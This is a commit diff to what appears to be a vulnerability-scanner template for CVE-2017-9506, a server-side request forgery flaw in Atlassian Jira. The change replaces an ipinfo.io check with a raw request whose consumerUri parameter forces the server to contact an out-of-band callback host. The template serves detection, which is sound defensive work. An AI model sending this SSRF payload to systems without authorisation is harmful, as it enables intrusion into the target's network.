OOB Template updates (WIP)

2021-04-18 22:06:07 +05:30 · 2021-04-18 22:06:07 +05:30 · de4f25fce7
parent fb2b4ca3c6
commit de4f25fce7
1 changed files with 13 additions and 5 deletions
--- a/cves/2017/CVE-2017-9506.yaml
+++ b/cves/2017/CVE-2017-9506.yaml
@ -1,3 +1,4 @@
+
 id: CVE-2017-9506

 info:
@ -12,11 +13,18 @@ info:
  tags: cve,cve2017,atlassian,jira,ssrf

 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
+  - raw:
+      - |
+        GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{BaseURL}}
+        Connection: close
+        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.9
+
    matchers:
      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
-          - "ipinfo.io/missingauth"
-        part: body
+          - "http"